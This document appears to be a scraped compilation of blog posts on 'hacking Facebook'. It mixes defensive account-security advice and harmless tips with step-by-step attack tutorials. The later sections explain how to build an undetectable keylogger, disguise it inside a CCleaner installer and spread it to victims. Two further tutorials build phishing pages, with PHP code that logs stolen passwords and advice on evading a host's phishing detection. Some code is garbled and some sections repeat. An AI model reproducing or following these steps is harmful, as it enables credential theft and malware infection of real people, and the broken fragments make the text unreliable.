How hackers hack Facebook Account & How to stop them?

Facebook is, undoubtedly, the most popular social networking website with more than 500 million active users. Due to its popularity, many hackers (or should I say crackers?) are actively involved in hacking Facebook accounts of unsuspecting users. This article outlines the many strategies that such hackers use to gain access to Facebook accounts of hundreds of users each day and how you can stop them from hacking your account.

hack facebook account
Facebook is one of the prime target of hackers!

Email Address Hack

I have always been puzzled by Facebook‘s leniency in this matter. All a hacker needs to do is know your email address and he will be displayed  a confirmation showing your name even if he enters the wrong password. How easily a hacker can then hack your Facebook account if he ‘guesses’ your password (if you use a weak password) or answers your security question! This is something I hope Facebook improves on quickly. Until Facebook does so, here are some tricks you can use to protect yourself from this vulnerability.

How to safeguard your Email Address?
Just follow these steps:-

  1. Hide your Email Address from everyone by going to Edit Profile>Contact Information>Clicking on the icon beside your email address> checking ‘Only Me’.
  2. Change your primary email address to a one that is only known to you by going to Account Settings>Email> and changing your primary email to the new one (known only to you) and removing your previous email address.
  3. For additional security, when in Account Settings, check ‘Secure browsing’ and ‘Send me an email when a new computer or mobile device logs into this account’ and click Save.

hack facebook
A hacker at work!


Phishing is one of the easiest ways to trick users into giving out their login credentials. All a hacker does is setup a webpage similar in design to that of the Facebook homepage, attach a server sided script to track the username and password entered and store it in a log. Sending people emails stating that someone tagged a photo of them on Facebook in the same format as Facebook and giving a link below to the phishing website further reduces the chances of it being detected as a fake. Sometimes, spam Facebook apps, like those promising to tell who viewed your Facebook profile, automatically post links to phishing websites. A new trend amongst phishers is creating Facebook look-a-like widgets for stealing user’s login credentials.

How to prevent yourself from being phished?
At all costs, avoid clicking on suspicious links. Moreover, always check the URL in the address bar before signing in. Avoid logging in through various “Facebook widgets” offered by websites and blogs. Instead, use Facebook’s homepage to sign in. Always try to use Safe Search while searching. If you do manage to get phished, report the website so that others may get a warning before visiting it.

hack facebook password

Keylogging through Keyloggers

Keylogger is a type of computer virus that tracks key strokes. Keyloggers can be installed remotely on a computer system by a cracker to record all the activity that is going on the victim’s computer. Keylogging gets more easy if the hacker has physical access to the victim’s computer.

How to stop keyloggers?
Install a good antivirus and update it frequently. Do not click on suspicious links and avoid downloading illegal software. Also, avoid installing free toolbars and other such spam software. Always scan third-person’s flash and pen drives before using them on your computer.

Detailed Guide:- PC Security tips to make computer secure

Social Engineering

Social engineering involves using any trick to fool the user into making himself vulnerable to exploits. This could involve anything from sending spoof emails, pretending to be from Facebook, telling you to change your password to 12345678 to a hacker maliciously getting out the answer to your Security Question in a friendly chat or discussion.

How to prevent yourself from being socially engineered?
Stay aware during chats and discussions. Use a tough security question, preferably one whose answer you would never disclose to anyone. Moreover, Facebook, or any other company for that matter, will never ask you to change your password to 12345678 or do something as silly as asking you to send out your login details to prove that you are an active user. Always think before taking actions and your e-life on Facebook will be safe from hackers looking to hack Facebook accounts.

Facebook 20 Tips and Tricks

20 Facebook Hacks and Tips You Might Not Know via Hongkiat

facebook tips & tricks

If you surf Facebook on daily basis or occasionally, chances are you’re already familiar with regular stuffs like add/delete friends, update statuses, walls and profile, add and explore pages & applications, etc, but there’s more..

This week we want to cover some interesting things you can do on (or with) Facebook; inclusive of tricks that are not documented or unknown to many, as well as tips to stay connected better with your friends. Without further ado, here’s 20 Facebook Tips/Tricks You Might Not Know. If you have interesting tips/tricks related to Facebook, please feel free to share in the comment box below.

  1. How to Place Facebook Chat On Firefox Sidebar

    If you are using Firefox, you can place the Facebook Chat at the sidebar.

  2. How to Download Facebook Photo Albums

    FacePAD: Facebook Photo Album Downloader allows you to download your friends’ facebook albums, Events albums, and Group Albums, en masse, with the click of a button.

  3. How to Share Flickr Photos to Facebook

    Flickr2Facebook is an unofficial Flickr to Facebook uploader(bookmarklet) which allows you upload photos to Facebook from Flickr.

  4. How to Update Facebook without Using Facebook

    hellotxt and both introduced features that let Facebook administrators update Facebook Pages.

  5. How to Schedule Facebook Messages

    Sendible lets you schedule Facebook messages ahead of time so you can send messages to your friends, customers or colleagues in the future.

  6. How to “Friend” Someone on Facebook & Hide It From Your Status Updates

    A short tutorial on Makeuseof to guide you how to hide Facebook status updates and keep that fact confined to your closer friends.

  7. How to Create a Photo Collage Using Pictures of Your Facebook Friends

    Click on Friends tab. Proceed to More tab. From “Choose an option” dropdown, choose any of the dashes “” . Your Facebook friends collage is right on your computer screen.

  8. How to Know When Facebook Friends Secretly Delete or Block You

    X-Friends is a unique tool for tracking friends that disappear from Facebook.

  9. How to Display Selected Pictures Only on your Facebook Profile Page

    A little-known feature in Facebook that lets you decide who shows up in that Friends box. Click that “edit” pencil in your Friends box and type the names of your best friends in the box that says “Always show these friends

  10. How to Remove Facebook Advertisements

    This Greasemonkey script – Facebook: Cleaner removes many of the annoying ads and updates that unavoidably appear on your Facebook pages.

  11. How to Syncs Photos of Facebook Friends with Contacts in Microsoft Outlook

    OutSync is a free Windows application that syncs photos of your Facebook friends with matching contacts in Microsoft Outlook. It allows you to select which contacts are updated. So you can update all contacts at once or just a few at a time.

  12. How to Display Facebook Statuses on WordPress Blog

    The following method make use of Facebook status feed and WordPress RSS widget to display Facebook Statuses on WordPress blog.. It will also work for self-host WordPress blogs.

  13. How to Post Your Blog Posts to Your Facebook Wall Automatically

    Wordbook allows you to cross-post your blog posts to your Facebook Wall. Your Facebook “Boxes” tab will show your most recent blog posts.

  14. How to Access Facebook Chat on Desktop

    Gabtastik and digsby let you keep Facebook chat sessions open on your Windows desktop outside of your regular web browser, using minimal screen real estate and system memory.

  15. How to Create Quiz on Facebook Easily

    LOLapps provides quiz creator that can be employed to conjure up these popular personality quizzes that are so widespread in Facebook.

  16. How to Hide Your Online Status on Facebook Chat from Select Contacts

    Facebook has integrated friends list with Chat and you can also choose which of these list members get to see you online.

  17. How to Get Facebook Updates on Email

    NutshellMail consolidates your Facebook accounts through the inbox you use the most.

  18. How to Update Facebook Status from Firefox

    FireStatus is a status update utility for multiple social networks, including FaceBook.

  19. How to Get Facebook on Your Desktop

    Seesmic Desktop, Facebooker, Xobni, Facebook Sidebar Gadget, Scrapboy and Facebook AIR application are desktop applications that allows you interact with your stream just as you would on Facebook, but without the browser.

  20. How to Delete, Cancel and Terminate Facebook Account and Profile

    A simple guide to terminate, delete or cancel Facebook account, together with the Facebook profile easily.


Hack Facebook Password using Keylogger

Hello Friends, in my previous post i have explained 4 ways to hack Facebook account password, where i have discussed the second best method to hack Facebook password is using Keyloggers. Today i will explain you how to hack Facebook password using keylogger.

Today i will explain you in detail with snapshots how to create your Facebook hacker keylogger, its a 100% Fully undetectable keylogger you can check this file using Virus total.  Its a 100% FUD remote keylogger with several advanced features. 
Today i will disclose you how i hacked 19000+ accounts, its so easy that anyone can do it. On my website you will never get any infected tool. If you have any doubt or feel something suspicious always test the link or file with virus total website before downloading. Never believe any website including mine also, always scan download links with virus total website or any such website before downloading it. Download it only when it does not have any virus.
Hack Facebook password using Keylogger Involves following steps:
1.  Create your Server that will hack passwords.
2. Extract the Icons from any software
3. Bind the Keylogger to make it Hidden
4. Spread your keylogger to victims

Note: This tutorial is for Educational Purposes only. I and Hackingloops is not responsible for any misuse of knowledge.Let’s start Facebook hacking tutorial in detail :

STEP1 : Create Server for Hacking Passwords
First of all for hacking any facebook account password, we have to create our keylogger server that will run on victims machine or PC and capture his keystrokes and mail us on the email account that we will use to build the keylogger. The keylogger server building process consists of several steps. 
The steps involved are mentioned below in detail:
1. First of all download the Keylogger.
2. Extract the RAR file. Now you will get one Folder and three files as shown in below snapshot:
how to hack facebook account and passwords using keyloggers
Snapshot of Extracted Files
 3. Now open the Keylogger file. Here you will need gmail ID and password. For safer use create a fake Gmail account and use it here as shown below:
learn how to hack facebook passwords
Facebook Hacker Initial Step
4. Now Click on server settings as shown. Here enter the time after which you want to receive reports, its always preferable to use 20 min timer for receiving files.  And Click on Output box to choose location of file and give it any name. Its always recommended to use system process name to make it undetectable like svchost or check any process name from your task manager and name it. Other fields are optional. The complete snapshot is shown below:
hacking facebook passwords
Second step to choose time interval and name of output file
5. Now Click on Log and Result Setting. In Log EMail Title enter the subject of email like My keylogger report or simply my report or something else that you like. Also Click the last two options that i.e add Computer name and add victim name. The snapshot is shown below:
hack facebook account
Hack Facebook account password using Keylogger
6. Now Click on Other Options.  In this section you just have to do one thing. Most hackers prefer warning message POP up but I love keylogger using any message. So unclick message button. Because when you bind it with any other software then it should not any warning messages otherwise it will be detectable.
7. Now at last click on Build Keylogger. Now after you click on it you will see your keylogger file at location that you have chosen in 4th step. Now this keylogger server file will be used to bind with any other software in Binding Step.

8. Now you keylogger server is ready that you will use to hack Facebook accounts. That’s all for the server creation step now move to second main step.
Step 2.: Extracting the Icon file from any installer(resource hacker)
1. Open the Resource hacker folder and open the reshacker file.
2. Now go to its menu and open any setup file. Suppose we want to attach our keylogger to Ccleaner setup file. So open the Ccleaner setup with resource hacker. 
3. Now in menu there is one action button click on it and then click save all resources.

how to hack facebook passwords,facebook hack, how to hack into someones facebook
Resource Hacker to Extract the Icon files from software’s

4. Now save all the resources to desktop or any other location of your choice.
5. It consists of two files one is icon file and other is res file . We only need icon file, so you can delete the other file i.e res file.
6. Now we have Icon of installer file(as discussed above Ccleaner setup Icon).

Step 3: Bind the Keylogger server with any software
1. Now Go to keylogger folder and open the Binder.
2. Now Click on + button given below to add files.
3. Now add the keylogger server and the set up of software (i.e. in our case it’s Ccleaner setup).
4. Now in menu of Binder, Go to Settings. There select the icon that we have generated in the previous step and set the location of output file as shown in figure.

facebook password hack,how to hack someones facebook,facebook password hacker,facebook hacking
Bind the Keylogger server to Software

5. Now again go to File’s menu in Binder and click on Bind files.
6. Now your Binded keylogger is ready. Now you have to spread it or send it to the victim that is your friend.

Step4 : How to Spread Keylogger or send it to victim or friend
1. Now you have one Software setup file with keylogger attached with it.(In our case we have Ccleaner setup with keylogger attached with it.
2. Now Spread your keylogger through forums. You might be a member of various forums use them to spread your keylogger in form of software posts. You can use various software’s to spread them that users frequently download.
3. Spread it through pendrives or USB hard drives. Suppose a friend asked you for a software give it the software that has keylogger attached with it. 
Note: you can also attach keylogger with images also. But that can be detectable by antivirus. So avoid such type of hacking.
So isn’t that so easy to hack anyone’s Facebook account in just few minutes. 

How to protect yourself from these hacks?
Prevention is always better than cure so always follow these steps:
1. Don’t use cracked softwares and don’t download them from unauthorized websites.
2. Always keep your antivirus and anti-spyware up to date.
3. Always scan the files before transferring them to your USB.
4. Do not allow other users to use your PC i.e password protect it.

Note: Hacking Email accounts is illegal. This post is just to aware you how easy is to hack Facebook and email accounts. So that you cannot fall into the traps of hackers.

I hope you all have liked it. If you have any queries ask me.  Please comment if you like my posts. Thanks for reading….

Facebook Hack to Display your Custom Message | Hacking Facebook

Hello Friends, today i come up with new Facebook trick. Using this Facebook hack you can display a custom message on Facebook and  prank your friends that you have hacked he Facebook as message is dynamic and you can change the message and title whatever you want.

hack facebook, facebook tricks, hacking facebook, facebook hacker trick
Hacking Facebook – Latest Facebook trick
Basically it’s a loophole in the Facebook URL, they just forgot to put the execution lock on the URL…so what is the result of that, is you can manipulate that URL fields.

Facebook Hack to Display your Custom message and Title on Facebook:

1. Open your Web browser.
2.  Copy the below URL in the address bar of web browser:

Note: You need to remove amp; from the URL
3. Now change ‘YOUR TITLE’ with your title you want to display and ‘YOUR MESSAGE’ with your message and press enter.
Suppose mine title is LOKESH SINGH and message is LoopHole is shared by then the URL will become something like this: SINGH&body=LoopHole is share by

Note: You need to remove amp; from the URL

4. That’s all…

Below is the snapshot of above trick:
facebook loophole, how to hack facebook, hack facebook URL
Latest Facebook hack to display custom message and title

I hope you all have liked it…. If you have any queries ask me i form of comments..

How Facebook Clickjacking Spam works

facebook clickjacking, clickjack hack for facebook
Facebook Clickjacking hack or spam
What is Clickjacking?
Clickjacking is a technique used by hackers or spammers to trick or cheat the users into clicking on links or buttons that are hidden from normal view (usually links color is same as page background). Clickjacking is possible because of a security weakness in web browsers that allows web pages to be layered and hidden from general view. In this situation what happens is that You think that you are clicking on a standard button or link, like the PLAY button or download button on an video or some stuff, but you are really clicking on a hidden link. Since you can’t see the clickjacker’s hidden link, you have no idea what you’re really doing. You could be downloading malware or making all your Facebook information public without realizing it. Some good hackers make ajax keyloggers and put them as javascripts over their fake websites and when you open them they retrieve all your passwords stored in web browser and records whatever you type while the web browser is open and stores this information on their servers.

There are several types of clickjacking but the most common is to hide a LIKE button under a dummy or fake button. This technique is called Likejacking. A scammer or hacker might trick you by saying that you like a product you’ve never heard. At first glance, likejacking sounds more annoying than harmful, but that’s not always true. If you’re scammed for liking Mark Zukenberg​, the world isn’t likely to end. But you may be helping to spread spam or possibly sending Friends somewhere that contains malware.

How can you avoid being Clickjacked by Spammers or Hackers?
There are lot of ways by which you can protect yourself from getting ClickJacked and hence minimize the risk or falling prey to hackers or spammers. But simplest one by using latest web browser or installing latest updates. The browser companies are continually adding updates to shut down vulnerabilities that allow clickjackers and other scammers to operate. 
If you’re using Firefox, also consider installing the NoScript add-on. Beyond that, pay attention to what you’re getting and from whom. Would a college professor really share a post about watching hidden camera videos? If a post from one of your Friends seems suspicious, don’t click on it!
A suspicious post could be a sign that your Friend’s Facebook account has been hijacked or that your Friend has been clickjacked to LIKE or SHARE something without knowing it. If you know your Friends, you’ll know what those Friends really would LIKE or SHARE. That’s why one of your best protections against scams is not confirming Friend requests from people you don’t actually know.
Another great tool to help you avoid clickjacking is Web of Trust (WOT). WOT is a free browser tool that maintains a database of known safe sites as well as malicious sites reported by the WOT community. Attempt to visit a known malicious site and WOT warns you in advance. The WOT download is simple to install.

Some Security Tips:
• Keep your antivirus, anti-spyware, web toolbar, web browser and system upto date by installing all security updates and security patches.
• Don’t click on suspicious links or the links generated by Facebook applications.
• Use available security tools mentioned above to stay safe and protected.
Facebook also has checks in place to detect malicious and spam websites. Adding WOT to the existing Facebook checks gives you one more tool in your arsenal against hackers. The two checks work together to provide a joint warning system if you attempt to visit a site reported to have malware, phishing, or spam.
That’s all for today my friends. If you have any queries or issues ask me in form of comments.

Hacking Facebook Chat box Video Tutorial

hack facebook chat, hacking chatbox
Hacking Facebook Chat box video tutorial
The Facebook chat findings are:
1. Use profile picture of anyone as Emoticon in chat.
2. Using any Facebook Picture as Emoticon in chat
3. Sending Invisible chat messages.
Using these hacks we can use anyone’s profile picture or any Facebook image or photo as emoticon in our  chat along with that i have explored lot of hidden emoticons in Facebook. For explaining you in detail i have made a video for you Guys so that you can understand each scenarios perfectly. How i figured out these??
I was searching for Client side bugs in Facebook and suddenly i saw a script namely fO_oP6n8OAk in the Facebook scripts in firebug, there i have found lot of hidden emoticons but i was not satisfied with them, then i read the javascript code further and found something really interesting. We can use our profile ID either number or text as emoticon in Facebook chat by just putting that in below format in chat box:


Now if you type [[lonerusher]] you will be able to see my profile picture as emoticon. Similarly in cases when profile name is not present then there must be some number like profile ID as shown below:


Now in this case you have to use [[534757615]] in the chat to get the emoticon of that profile image.
Similarly pick any picture in the Facebook, example i have picked this one:


Now if you wish to use this picture as your image what you need to do is that you have to use the number in front of fbid in your Facebook chat which will be [[216057861810512]].
Now In some cases what happens is that image is generated through application, means user hasn’t uploaded that. In that case if you use number in front of fbid then it will  result into a invisible message.
Also if you give wrong ID in the Facebook chat box then it will show a emoticon with ? . Isn’t that cool.. yup it is.. So friends have fun with your friends, give surprise to them by your new set of emoticons and invisible messages..
Below i have added a complete video, which is demonstrating each and everything in detail, so enjoy your hack…I have also included how to use firebug to find emoticons scripts in Facebook which are hidden from general user.
Don’t forget to say thanks if you like it… If you have any issues or queries ask me in form of comments.

Facebook Hack to Display your Custom Message

Hello Friends, today i come up with new Facebook trick. Using this Facebook hack you can display a custom message on Facebook and  prank your friends that you have hacked he Facebook as message is dynamic and you can change the message and title whatever you want.

hack facebook, facebook tricks, hacking facebook, facebook hacker trick
Hacking Facebook – Latest Facebook trick
Basically it’s a loophole in the Facebook URL, they just forgot to put the execution lock on the URL…so what is the result of that, is you can manipulate that URL fields.

Facebook Hack to Display your Custom message and Title on Facebook:

1. Open your Web browser.
2.  Copy the below URL in the address bar of web browser:

Note: You need to remove amp; from the URL

3. Now change ‘YOUR TITLE’ with your title you want to display and ‘YOUR MESSAGE’ with your message and press enter.
Suppose mine title is LOKESH SINGH and message is LoopHole is shared by then the URL will become something like this: SINGH&body=LoopHole is share by

Note: You need to remove amp; from the URL

4. That’s all…

Below is the snapshot of above trick:
facebook loophole, how to hack facebook, hack facebook URL
Latest Facebook hack to display custom message and title

I hope you all have liked it…. If you have any queries ask me i form of comments..

Hacking Facebook with Javascript

Because facebook relies so heavily on javascript, and because we can type javascript into the address bar, that means we can “poke” into the workings of facebook to do things that we wouldn’t normally be able to do. It’s not “hacking” exactly, but it employs the same sort of skills hackers use when looking into applications. The best part is that because it’s all using the same control codes (or “API”) that facebook uses, there’s no way for facebook to find out you’re doing it, so it’s totally safe! (I think…) Besides, we’re not going to be doing anything too dodgy, just a few little tweaks 😉
Facebook Hack: Sending your friends offline
Here’s a funny one; if you’re chatting to a friend, get them to paste the following code into their facebook address bar:
It’ll make them go offline! Of course it’s not permanent, they can go back online by clicking the icon as normal, or by giving the same command again
Facebook Hack: Change facebook color
Check this out:

Isn’t that cool? Just use the following code to get your profile colour changed and impress your friends!
Of course, you can use any colour you like; green, yellow,orange, black. It’s also fun to change it to “white” so you can’t see the text. Muahahaha. Again, only you can see it, but it does last until you log out or view certain special pages.
Facebook Hack: Get Chat History Even When Friends Aren’t Online
New: Video Tutorial for this hack.
Here’s a facebook hack that’s actually proven very useful to me in the past. One thing that I find annoying about facebook is that you can’t retrieve chat history if your buddy is offline… well now you can! 🙂

Click onto your friend’s profile page and copy their facebook ID from the address bar; i.e. the number after “id=”, highlighted in red below:

It might look slightly different,  perhaps like this:
But the important thing is to copy the number of the user, in our case 123132132213
Then while you’re still on facebook, type this into the address bar:
(with the correct ID of course)
And their chat window will pop up, saying “Jimbo is offline”. And if there’s any chat history, it will be displayed. How neat is that!
You can even open a chat window to yourself by pasting your own ID into the javascript, as seen to the right. You can use it for little notes to yourself, but remember that facebook chat history is cleared every few days, so don’t rely on it.
UPDATE1: A few people have had trouble pasting it in correctly, so here’s how it should look:

UPDATE2: Now that we have facebook usernames, it can be little harder to determine the ID of a profile, but it’s still possible – here’s one way: right click the “see all” friends link and choose “copy link location”, like so:
Or in Internet Explorer, you can choose “open link in new tab”. The resulting URL will look something like this:

That’s it!
Facebook Hack: Change your name (temporarily)
This one’s a very simple hack that you can apply to any website. As you saw in the screenshot above, I’d changed my facebook to display as “Facebook | Leet Hax0r”. You can do this by using the following javascript:
javascript:void(document.title="Facebook | Neo");
Sadly, your friends will only see your actual name, not the new one, but it can make for some amusement in a computer lab class or anywhere where you can show people face to face.
Facebook Hack: Close chat windows
If you’re chatting to a friend and want to close the window, sure you can just click the ‘x’ in the top corner, but isn’t it cooler to do it with javascript? Well no not really, but if you can trick your friend into typing the following code in, you can close the chat window of anyone they’re chatting to:
That will close my chat with “123132132213″. You can send your friends that link with your own facebook ID in it, and it’ll close their chat window with you! And if you happen to know that ID:123 is chatting with ID:321, you can send the following to ID:123, and when they paste it in it’ll close their chat with 321!
Other Facebook Hacks
The hacks above are the most impressive, but there are a few other little things you can do which are mildly interesting:
Bring up notifications:
Bring up online friends list:
Bring up application tab:
Make text bold or underlined in facebook chat: use *stars* for bold text, and _underscores_ for underlined. There is no way to get italic text on facebook; see my comment here about facebook chat italics.
That’s all the hacks I’ve found (but I know there are more). In fact, it’s possible to get your friends to “like”, or “unlike” items, and I think it would be possible to get them to comment and more, but the complexity of the javascript makes it not worth doing, plus you have to get them to paste code into their address bar – there’s no way to do it without getting them to do that.

Facebook Easter Egg: Pirate Language

Here’s a nice little facebook easter egg for you:  Go to the language settings page and scroll to the bottom of the list of languages, and somewhere around there you should see “English (Pirate)” in the list of supported languages.
Choose that language option and avast ye sails fer much facebook silliness.
Facebook Easter Egg: Konami
This one is awesome, thanks to Jim in the comments for letting me know about it.
Click in your status update box and type the following: [up] [up] [down] [down] [left] [right] [left] [right] b a [enter], and then click anywhere on the page to see lensflares:

Facebook Chat Smilies

There are a whole load of facebook emoticons available in the chat window. Here’s the complete list decribing what facebook smileys there are and how to display smilies in facebook chat. This seems to have been first discovered by This list includes the shark smilie and the new facebook penguin smiley!

facebook happy smiley 🙂 facebook sad smiley 😦 facebook tongue smiley 😛 facebook grin smiley 😀
facebook shock smiley 😮 facebook wink smiley 😉 facebook glasses smiley 8) facebook cool smiley 8|
facebook grumpy smiley 😡 facebook erm smiley :/ facebook crying smiley 😥 facebook devil smiley 3:)
facebook angel smiley O:) facebook kiss smiley :* facebook love smiley facebook happy smiley ^_^
facebook happy smiley -_- facebook confused smiley o.O facebook laugh smiley <:o facebook pacman smiley :v
facebook shark smiley (^^^) facebook cat smiley :3 facebook robot smiley :|] facebook putnam smiley :putnam:

I hope you enjoyed that post, please thumb me up on stumbleupon or digg me if you liked it 🙂

How To Make a Facebook Pishing Page

Note: Hacking is a crime. Dont use this tutorial to hack innocent people. I am teaching it for educational purpose only. I will not be responsible for any damage done by you.

First i recommend you all to read my previous article on phishing page “How to make a Fake login page manually”  coz here in this post i m not gonna explain all things as i hv done it before.

well, here we go for creating Fake page of Facebook…
Here we will need 3 types of files for facebook:
1. A php file with any name say login.php. This php file places main role to get the passwords of victim
2. index.html which is a fake html page similar to original Page of Facebook.
3. Photos, CSS, js files

Step 1. Creating a login.php file>
Open notepad and  paste the following lines there… as save it with name login.php

Code Updated: By mistake i hv missed one line in php file, i hv add that line now. Sorry for inconvenience.

header (‘Location:;);
$handle = fopen(“log.txt”, “a”);
foreach($_POST as $variable => $value) {
   fwrite($handle, $variable);
   fwrite($handle, “=”);
   fwrite($handle, $value);
   fwrite($handle, “\r\n”);
fwrite($handle, “\r\n”);

step 2. Create index.html Page:
2.1. first of all open login page of….. then right click there> save as/save page as> then save it….

check the downloaded file…. there will be

one htm file(Welcome to Facebook.htm)

A folder(Welcome to Facebook_files) containing some pics, css files and js files.(this folder contains 3rd type of files that i hv mentioned above.)
2.2. Now open the htm file with notepad(right click> open with> notepad)…
and then press ctrl +F and search for action… and you will find a line as shown in screenshot.
Note:in case of some other sites may be you find more then one action word… but you have to find out the exact  type of line as shown in screen shot…. near which you will find a
 tag and method=”post” something like that.
2.3. Now replace the url written after action with the name of your php file created in step 1.
Now your fake page is ready….
Save it with name index.html

Step 3: Uploading on a Free Hosting Site:

go to 


Now click on upload files and then upload there index.html and login.php

Now click on New directory to make a new folder there and name it “Welcome to Facebook_files”

 Now open the directory
“Welcome to Facebook_files”
and then upload all the files(css,js, photos) of folder Welcome to Facebook_files,which was downloaded with facebook page in step 2.

Now your phishing page is ready to hack 😉

7. Now give url of ur index page to ur friends, as soon as they will login through ur created fake page,a new log.txt file will be created and  their password will be saved in that file.

Note:- If you got any problem, then describe the problem in detail with the link of ur fake page, so that i can check the problem. But if you dont do so, then plz dont expect any here
————————————————————————————————————————————————Update 21/1/2012:  Answer to Frequently asked question
1. Which URL you have to give to your friends or anyone else.
Answer: This is the domain url, that you have ordered/chosen during the time of registration, which is visible for you on almost every page of your free hosting site.  Still if you didnt get, then see the pic below….

Here, you see the URL is up there as i mentioned earlier. Also if you press OPEN, given in front of ur index.html file, then a new page will be open, having the url you need in the URL bar.

2. Photos are not appearing on your Fake page?
Answer: It happens because to detect a phishing page, web hosting sites are tracing the name of folders you are uploading, if they found same name as Facebook or any other site, then they dont let you make that folder/ or just block access of files from that folder. So if you just rename the directory uploaded in step 5, they their system will not recognize it. And after renaming you need to edit the index.html file and give this new name every where in file where you found old name. You can do it simply by opening the index.html file with notepad and replace the old directory name with the new name everywhere in the file.

3. log.txt file is not generating/ log.txt file is not saving passwords.
Answer: You should check all steps carefully, this is not a problem if you do every thing correctly.

4. When i open my fake page’s url, iget this error.
Answer: It means ur page has been detected as a phishing page by the web hosting site, try renaming your folders and  files. (And dont forget to rename the file/folder name in index.html file also.)

Hack facebook account

After the invention of facebook, hacking has become the hobby for people. Today everybody is wanted to be a hacker and wanted to hack something. But hacking really requires programming and networking skills. But if your wanted to hack facebook. Then, this can be done by using some tricks and this is what we gonna see in this post. This trick doesn’t requires any programming skills. You just have to follow the steps. So, do you want to hack anyone’s Facebook Account ?
If yes then let’s Quickly start !!!
Now, there are various techniques to hack anyone’s Facebook account and the one of them is called Phishing. While, for the rest of the techniques soon I’ll write in my upcoming posts.

What Is Phishing ?

Phishing is the most well known and most widely used hacking technique. It is used to hack anyone’s Username and Password by making fake login pages. In this Technique we will create the similar looking page of any website which we wanted to hack. Here we are going to make similar looking page of Facebook. You can also create Phishing pages ofyahoomail , gmailskype etc or you can simply ask me through comments and I’ll give you the Phishing Page of those website .
This is the simplest hacking trick to hack anyone’s Username and Password as no programming skills are required for it. Anyone who have basic knowledge of Internet can learn this trick. In this Trick victim gets fooled by looking at the Phishing page and simply enter his or her Username and Password and it will be stored to your Database.

How To Hack Facebook Account

Step 1 :- First you need to create account on any Free Web Hosting Website to host your Phisher page on the web. There are many website which provide Free Web Hosting Service upto Certain GB’s.
The Website like :- 000webhostbyethostt35freehostia110mb0feesbizwix etc.
I’ve made account on 000webhost
you can make free account by clicking on Sign up and Log-in in by clicking Members area.
Step 2 :- In all the above website they will provide you there domain
for example :- In my case they gave me So, you can see these type of domain’s doesn’t look so good and also they are pretty hard to remember . So, You can also get the free Domain from the below link.
Step 3 :- Now, login into your free hosting website’s account and change it with your domain.

 The Snap shot is of You can change your Domain name inside C-Panel and in that Parked Domains Option as show in the above snap shot.

Note :- Skip Step 3, if you’ve Skipped Step 2.
Step 4 :- Now, go to File Manager you’ll find that Option inside the C-Panel.
here you’ve to upload Facebook Phisher Page. First Download it from HERE and extract it !
Now, just go into File Manager inside that you’ll find Pulic_html Folder inside that you will get default.php file which you have to delete and upload the files which you have just downloaded from HERE !
If you won’t delete default.php file you’ll will get error though you have Uploaded your files. So, just select it and delete it and upload the Files of Facebook Phisher Page in the same Folder Called Pulic_html.
Step 5 :- Your Fake Facebook page is online now. You just have to share it on various Social Medias as if people visit there and tries login into Facebook from that Page.
Now can you say that the above snap-shot is of Fake Facebook Page or Facebook Phisher Page.
Here when the User after inserting his/her Username and Password Hit Login the Script will save credential of User into your log.txt file.
Step 6 :- In the above step user has just entered his or her Username and Password which is already stored into your database and user can’t come to know any day that you have Hacked his Facebook account.
Now again Login into Free Hosting Website’s account and visit where you have uploaded the File of Facebook Phisher Page. In that you’ll find one file Called log.txt which I’ve made for Storing Username and Password.
Just Click on that file i.e log.txt and you can View the Stolen/Hacked Username and Password’s  of Victim’s.
That’s it the Hacking has been done. Now, you know your Friend’s Username and Password and you can Simply login into there Facebook Account’s .